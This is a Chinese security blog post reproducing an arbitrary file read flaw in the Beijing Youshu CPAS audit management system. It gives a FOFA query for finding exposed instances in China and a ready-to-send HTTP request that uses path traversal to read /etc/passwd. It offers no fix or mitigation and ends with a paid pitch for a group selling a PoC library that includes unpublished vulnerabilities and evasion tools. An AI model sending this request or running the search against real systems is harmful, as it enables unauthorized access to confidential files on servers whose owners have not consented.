【漏洞复现】北京友数 CPAS 审计管理系统存在任意文件读取漏洞

FL_Clover 网络安全007 2025-01-01 08:52

漏洞介绍

在当今复杂多变的商业环境中，审计管理系统对于确保企业合规运营、防范财务风险起着中流砥柱的作用。北京友数 CPAS 审计管理系统凭借其专业的功能模块与出色的适配性，在众多行业领域获得了广泛应用，为企业和各类机构的审计工作提供了有力支撑。

据最新消息称，北京友数 CPAS 审计管理系统存在任意文件读取漏洞。
这一漏洞如同系统的 “缺口”，一旦被恶意利用，攻击者通过简单技术构造指令，就能突破文件读取权限限制，肆意翻阅机密文件，企业的审计底稿、未公开财务线索、商业秘密文件及员工敏感信息等，都可能暴露。这不仅会致商业机密泄露，打乱企业市场布局，还可能让员工受诈骗、骚扰，影响凝聚力。

漏洞复现

1.资源探测

fofa:icon_hash="-58141038" && country="CN"

2.漏洞复现

漏洞POC

GET /cpasm4/plugInManController/downPlugs?fileId=../../../../etc/passwd&fileName= HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

帮会介绍

【帮会服务】

1.最新漏洞库（目前已1000+poc，定期更新，包含部分未公开漏洞）

2.应急响应资料库（热门病毒应急响应手册，应急工具）

3.安全书籍库（市面上热门安全书籍电子版）

4.字典库（攻防实战字典合集，字典生成工具）

5.安全制度库（100+篇安全管理制度汇编）

6.攻防演练红蓝队实战经验库

7.工具库（攻防实战工具，日常渗透工具，免杀工具，代码审计工具等）

加入方式

帮会刚建立，现在加入可享早鸟价：

原价
19.9月卡

现在
29.9元享永久会员！

限时两周！！！
限时两周！！！

随着资源的积累后续会直接涨价至
99.9！

PC链接：https://wiki.freebuf.com/front/societyFront?society_id=291

微信扫码加入

免责声明：  本文章仅做网络安全技术研究使用！另利用网络安全007公众号所提供的所有信息进行违法犯罪或造成任何后果及损失，均由使用者自身承担负责，与网络安全007公众号无任何关系，也不为其负任何责任，请各位自重！公众号发表的一切文章如有侵权烦请私信联系告知，我们会立即删除并对您表达最诚挚的歉意！感谢您的理解！让我们一起为我国网络安全事业尽一份自己的绵薄之力！

●推荐阅读●

日常实战渗透小技巧，掌握就无需担心漏洞产出为零！

红队如何在攻防演练中一夜暴富？

全方位揭秘：50多种横向渗透提权终极技巧，一篇文章彻底掌握！

未授权访问漏洞系列

应急响应系列

浅谈Nacos漏洞之超管权限后续利用

记某APP服务端渗透测试实战GetShell

实战|某网站未授权访问=》数据库权限=》服务器权限

Nessus漏扫神器之攻防两用

超级弱口令工具+超级字典，攻防必备！

写作不易，分享快乐

期待你的 分享
●点赞●在看●关注●收藏